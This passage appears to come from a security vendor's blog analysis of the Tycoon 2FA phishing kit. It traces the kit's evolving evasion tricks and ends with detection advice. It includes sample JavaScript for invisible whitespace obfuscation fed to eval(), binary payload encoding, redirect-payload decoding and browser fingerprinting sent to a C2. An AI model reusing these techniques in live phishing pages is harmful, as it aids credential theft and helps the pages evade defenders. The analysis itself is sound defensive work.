The script disables the right-click context menu, preventing access to browser tools or page source inspection. 

Figure 27: Code for Disabling Context Menu 

Improved Evasion Mechanism #6: Debugger Timing Check

Building on the rudimentary version in earlier samples, this implementation fully measures the time taken to launch a debugger. If the timing is abnormally long (suggesting a sandbox environment), the script redirects to a legitimate page, halting execution. 

Figure 28: Enhanced Debugger Timing Check Implementation 

Attack Detected on 17 December 2024  

In another attack from December, the threat introduced a new capability to enhance the phishing page’s authenticity, making it more convincing to victims. 

Evasion Mechanism #17: Dynamic Multimedia via Legitimate CDN 

Specifically, the phishing page dynamically loads a logo and custom background tailored to the domain of the victim’s email address, increasing its visual credibility.  

Figure 29: Phishing page with custom background

The multimedia content is delivered through Microsoft’s legitimate AADCDN network, leveraging trusted infrastructure to evade detection and reduce suspicion. 

Figure 30: Use of AADCDN for loading custom logos/backgrounds 

Attack Detected on 3 April 2025 

This sample introduces multiple new evasion mechanisms across various stages, reflecting Tycoon 2FA’s continued evolution in obfuscation, redirection, and anti-analysis techniques. 

Stage 1: Enhanced Obfuscation 

Evasion Mechanism #18: Complex JavaScript Code 

The payload uses Base64 obfuscation for JavaScript keywords, and method calls (e.g., document.write()) are invoked via object property access, complicating static analysis.  

The next stage’s content involves URL-encoding/decoding, further obscuring the code.  

Figure 31: More sophisticated code in Stage 1

Stage 2: New Evasion Techniques 

When Stage 2 code is deobfuscated, we can observe new evasion methods. 

Evasion Mechanism #19: Invisible Obfuscation 

The code employs whitespace-based “invisible” obfuscation, using proxy object calls and getter methods to retrieve and execute code via eval(). This technique makes the code harder to read and analyze. 

Figure 32: Invisible obfuscation code #1 
Figure 33: Invisible obfuscation code #2 
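The principle can be illustrated with a toy codec that maps bits to whitespace (the kit itself uses invisible Hangul filler characters, but the idea is the same: the encoded program looks visually empty):

```javascript
// Toy "invisible" codec: each byte becomes 8 whitespace characters
// (space = 0, tab = 1). Real samples use invisible Hangul filler chars.
function invisibleEncode(code) {
  return [...Buffer.from(code)]
    .map(b => b.toString(2).padStart(8, '0'))
    .join('')
    .replace(/0/g, ' ')
    .replace(/1/g, '\t');
}

function invisibleDecode(blob) {
  const bits = [...blob].map(c => (c === '\t' ? '1' : '0')).join('');
  const bytes = bits.match(/.{8}/g).map(b => parseInt(b, 2));
  return Buffer.from(bytes).toString('utf8');
}

// The kit then feeds the decoded string to eval() via proxy/getter tricks.
```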

The form sent during the transition from Stage 2 to Stage 3 is now created as a FormData object, replacing the previous HTML <form> element approach, reducing detectability. 

Figure 34: Old HTML form declaration 
Figure 35: New FormData declaration 

Evasion Mechanism #20: Custom Fake Page Redirect 

Unlike earlier samples that redirected to legitimate sites (e.g., eBay) upon failing checks, this revision redirects to a custom fake HTML page, enhancing deception and avoiding reliance on external domains. 

Figure 36: Example of custom fake page

Evasion Mechanism #21: Custom CAPTCHA 

A custom CAPTCHA replaces the previously used Cloudflare Turnstile, likely to complicate signature-based and behavioral analysis and mitigate potential issues with Cloudflare’s security services.  

Figure 37: Custom CAPTCHA Code Fragment 
Figure 37: Custom CAPTCHA 

Stage 5: Clipboard Protection 

Evasion Mechanism #22: Disabling Clipboard Copying 

In addition to filling the clipboard with junk data (as seen in earlier samples), this revision prevents copying from the login form’s input fields, further hindering analysis.  

Figure 38: Code for Disabling Clipboard Copying 

Stage 6: Enhanced Data Exfiltration 

Evasion Mechanism #23: Custom Binary Encoding 

Data exfiltration now uses binary encoding for payloads, adding an additional layer of obfuscation.  

Figure 39: Code for binary encoding of payload 

A sample of the payload can be decoded with CyberChef; the result is the decrypted data.  

The decryption key and IV are both the hardcoded string 1234567890123456. 

Figure 40: Example of decrypted payload
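Binary encoding of this kind is trivial to reproduce; a sketch (the exact framing used by the kit may differ):

```javascript
// Encode a payload as a string of '0'/'1' digits, 8 bits per byte.
function toBinaryString(payload) {
  return [...Buffer.from(payload)]
    .map(b => b.toString(2).padStart(8, '0'))
    .join('');
}

function fromBinaryString(bits) {
  return Buffer.from(bits.match(/.{8}/g).map(b => parseInt(b, 2))).toString('utf8');
}
```

The encoding adds no cryptographic strength; it simply keeps credentials out of plain-text network captures.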

Attack Detected on 14 April 2025 

This sample introduces a more complex method for launching the Stage 1 payload, leveraging redirect chains to obscure the attack’s entry point. 

Evasion Mechanism #24: Extended Redirect Chain  

Clicking the initial phishing link triggers a redirect to Google Ads, followed by another redirect to a malicious URL that uses the following format:  

hxxps://<domain>/?<2nd_domain>=<base64_payload> 

A script then extracts the Base64 payload from location.search, decodes it, and constructs the URL for the Stage 1 payload.  

This extended redirect chain makes it harder to trace the attack’s origin. 

Figure 41: Code for calculating phishing page URL
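The extraction step can be sketched as follows (in the browser, the argument would be location.search; splitting on the first “=” keeps any Base64 padding intact):

```javascript
// Pull the Base64 payload out of a query string shaped like
// "?<2nd_domain>=<base64_payload>" and decode it.
function decodeRedirectPayload(search) {
  const query = search.startsWith('?') ? search.slice(1) : search;
  const sep = query.indexOf('=');           // split on the FIRST '=' only,
  const secondDomain = query.slice(0, sep); // Base64 may end in '=' padding
  const b64 = query.slice(sep + 1);
  return { secondDomain, decoded: Buffer.from(b64, 'base64').toString('utf8') };
}
```

The decoded value is then used to assemble the Stage 1 URL; the exact assembly logic varies by sample.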

The full redirect chain, from the initial link to the Stage 1 payload, is shown below: 

Figure 42: New redirect chain to Stage 1

Additionally, in POST requests, the cf-turnstile-response field (previously used for Cloudflare validation) is now filled with a placeholder value (qweqwe), confirming Tycoon 2FA’s shift away from Cloudflare. 

Evasion Mechanism #25: Rotating CAPTCHAs 

This revised version replaces the previously used custom CAPTCHA with Google reCAPTCHA.  

Figure 43: Use of Google reCAPTCHA in Tycoon 2FA 

Historical data shows Tycoon 2FA has cycled through different CAPTCHAs, such as IconCaptcha (observed in a submission on April 7, 2025).  

Figure 44: Example of IconCaptcha in Tycoon 2FA  

The use of varying CAPTCHAs complicates signature-based detection. 

Attack Detected on 23 April 2025 

Around this period, Tycoon 2FA introduced a new anti-detection mechanism focused on browser fingerprinting to detect sandbox environments and bot activity. 


Evasion Mechanism #26: Browser Fingerprinting

After the phishing link is opened, the loaded page requests an image element and, when the request fails, executes a Base64-encoded script from the image’s onerror handler.  

Figure 45: Suspicious onerror handler in image element 



After decoding with CyberChef, the script reveals functionality for:  

  • Collecting browser environment details: screen parameters, browser/platform name, URL, host, protocol, console properties, and document body.  
Figure 46: Code for collecting execution environment data 
  • Gathering additional data: timezone, JavaScript runtime internals, iframe checks, and graphical interface properties.  
Figure 47: Code for collecting browser properties 
  • Collecting miscellaneous technical information. 

The collected data is formatted as JSON, inserted into an invisible form, and sent to the attacker’s server via a POST request.  

Figure 48: Invisible form for sending fingerprint data 
Figure 49: Example of sent fingerprint data
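The collection step can be approximated with a function that reads from an injected environment object (in the browser this data comes from window, navigator, and screen; the field set below is a simplified subset of what the kit gathers):

```javascript
// Build a JSON fingerprint from injected environment data.
function buildFingerprint(env) {
  return JSON.stringify({
    screen:   { w: env.screen.width, h: env.screen.height },
    platform: env.navigator.platform,
    ua:       env.navigator.userAgent,
    url:      env.location.href,
    tz:       env.timezone,
    inIframe: env.inIframe,
  });
}

// The result would then be placed into a hidden form field and POSTed to the C2.
```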

The server analyzes the fingerprint data and returns a response with a Location header, leading to one of two outcomes:  

  • Redirect to a Legitimate Page: If checks fail (e.g., sandbox detected), the user is redirected to a legitimate site like Emirates, Tesla, or SpaceX. 
Figure 50: Example of failed C2 check redirect 
  • Redirect to Stage 1 Payload: If checks pass, the user is directed to the Tycoon 2FA Stage 1 phishing page. 
Figure 51: Example of successful transition to phishing page 

This mechanism also allows the attacker to geographically restrict the operation of the malware, enabling Tycoon2FA to launch in certain regions while terminating the attack process in others. 

Attack Detected on 6 May 2025 

Evasion Mechanism #27: Obfuscation through Encryption 

In this sample, we can observe that the Tycoon2FA operator began using AES encryption for payload obfuscation, not just for uploading/downloading stolen and service data in the final stages of execution.

Figure 52: Code for obfuscation via encryption

In all other parts, the execution chain of the new samples remains similar to the original.  

All Tycoon2FA Evasion Mechanisms 

#  Description  Sample  Date Observed 
1  Basic Obfuscation  https://app.any.run/tasks/7a87388b-8e07-4944-8d65-1422f56d303f  1 October 2024 
2  Nomatch Check 
3  Current Page Location Check 
4  Redirect to Fake Litespeed 404 Page on Failed Checks 
5  Cloudflare Turnstile 
6  Debugger Timing Check 
7  C2 Server Authorization for Payload Execution 
8  Base64/XOR Obfuscation 
9  Encryption of C2 Control/Exfiltrated Data 
10  Victim Browser Detection 
11  Clipboard Content Manipulation 
12  C2 Request Routing 
13  Redirect API Validation 
14  Debug Environment Detection (Selenium, etc.)  https://app.any.run/tasks/57f31060-cc3e-4a65-9fa9-f460ede5f39c  6 December 2024 
15  Keystroke Interception 
16  Context Menu Blocking 
17  Use of Legitimate CDN for Corporate Logos/Backgrounds  https://app.any.run/tasks/9700f36a-d506-4e5e-8f96-cdddc83e37a0  17 December 2024 
18  Complex JavaScript Code  https://app.any.run/tasks/d40e75ba-e4e8-4b51-b4a5-6614c8be7891  03 April 2025 
19  Invisible (Hangul) Obfuscation 
20  Redirect to Custom Fake Page on Failed Checks 
21  Use of Custom CAPTCHA Instead of Cloudflare 
22  Disabling Clipboard Copying 
23  Binary Encoding for Exfiltrated Data 
24  Extended Redirect Chain Before Payload Execution  https://app.any.run/tasks/3bb9892b-4c3d-4c5e-a44d-d569cab8578e  7 April 2025 – 14 April 2025 
25  Use of Different CAPTCHAs (reCAPTCHA, IconCaptcha, etc.) 
26  Browser Fingerprinting  https://app.any.run/tasks/7c54c46d-285f-491c-ab50-6de1b7d3b376  23 April 2025 
27  Obfuscation via Encryption  https://app.any.run/tasks/c43d00a5-60d9-433a-8aee-d359eaadf0ab  6 May 2025 

Conclusion 

The operators and developers of the Tycoon 2FA Phishing-as-a-Service (PhaaS) framework continue to actively enhance their product, focusing on complicating analysis of the malicious software. 

Tycoon 2FA is adopting increasingly sophisticated anti-bot techniques, such as rotating CAPTCHAs (e.g., Google reCAPTCHA, IconCaptcha, custom CAPTCHAs) and browser fingerprinting, to protect its infrastructure from crawlers and Safebrowsing solutions. 

The analysis indicates that several versions of Tycoon 2FA are active simultaneously: the evasion methods vary across samples and time periods, and some techniques appear, disappear, and later return.  

Alongside the primary focus on Microsoft Outlook authentication phishing, variants targeting Google account authentication have been observed:  

https://app.any.run/browses/b9c0b778-df32-4073-a580-18d7fc330518

https://app.any.run/tasks/a487cada-21b9-48e2-a7f3-470e3eddab0d

Despite the addition of new evasion techniques, some methods lack sophistication and remain relatively easy to bypass: 

  • Obfuscation: Most obfuscation relies on public tools like obfuscate.io, which can be reversed using deobfuscate.io.  
  • Limited JavaScript Exploitation: Tycoon 2FA does not fully leverage advanced JavaScript runtime capabilities, such as prototype manipulation, reflection mechanisms, or other dynamic code restructuring techniques. 

In certain aspects, Tycoon 2FA’s evasion mechanisms seem quite amateur. For example, across all observed samples, C2 payloads and exfiltrated data are encrypted/decrypted using hardcoded keys and initialization vectors (1234567890123456 for both key and IV). Ideally, unique keys should be generated per session to enhance security. 

The core architecture of Tycoon 2FA remains unchanged, relying on three domains: 

  • Primary phishing domain: Hosts the phishing page.  
  • Controller domain: Authorizes or denies further execution based on protective checks.  
  • Exfiltration domain: Receives stolen data. 

Similarly, the execution chain of the framework has remained consistent, enabling detection through behavioral analysis despite the introduction of new evasion mechanisms. 

Recommendations for Detecting Tycoon 2FA 

Given the constant changes in the source code of Tycoon 2FA phishing pages, signature-based analysis is largely ineffective, and behavioral analysis is essential for reliable detection.  

Tycoon 2FA employs a “triangle” of Command-and-Control (C2) domains from a specific pool of top-level domains (TLDs), including .ru, .es, .su, .com, .net, and .org. It also consistently loads a predictable set of JavaScript libraries, CSS stylesheets, and other web content, which can be leveraged for detection: 

Libraries: 

Okta CSS: 

Misc hyperlinks/web-content: 

To detect Tycoon 2FA, security teams can implement a heuristic based on the following behavioral patterns observed in a single session: 

  • C2 Domain Triangle: Communication with a set of domains from the TLD pool (e.g., .ru, .es, .su, .com, .net, .org).    
  • Resource Loading: Retrieval of the specific JavaScript libraries, CSS stylesheets, or web content listed above.    
  • Session Redirect: A redirect to the official Microsoft authentication page at the end of the session. 

If all three patterns are observed in a single session, there is a high probability that the activity involves Tycoon 2FA phishing. 
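As a sketch, the heuristic can be expressed as a predicate over observed session data (thresholds and field names are illustrative, not a production detection rule):

```javascript
const TYCOON_TLDS = ['.ru', '.es', '.su', '.com', '.net', '.org'];

// session = { domains: [...], loadedResources: [...], finalRedirect: '...' }
// knownResources = list of the Tycoon-specific JS/CSS artifacts noted above
function looksLikeTycoon2FA(session, knownResources) {
  const c2Triangle = session.domains.filter(
    d => TYCOON_TLDS.some(tld => d.endsWith(tld))).length >= 3;
  const knownContent = session.loadedResources.some(
    r => knownResources.includes(r));
  const msRedirect = session.finalRedirect.startsWith(
    'https://login.microsoftonline.com');
  return c2Triangle && knownContent && msRedirect;
}
```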

The post Evolution of Tycoon 2FA Defense Evasion Mechanisms: Analysis and Timeline appeared first on ANY.RUN’s Cybersecurity Blog.
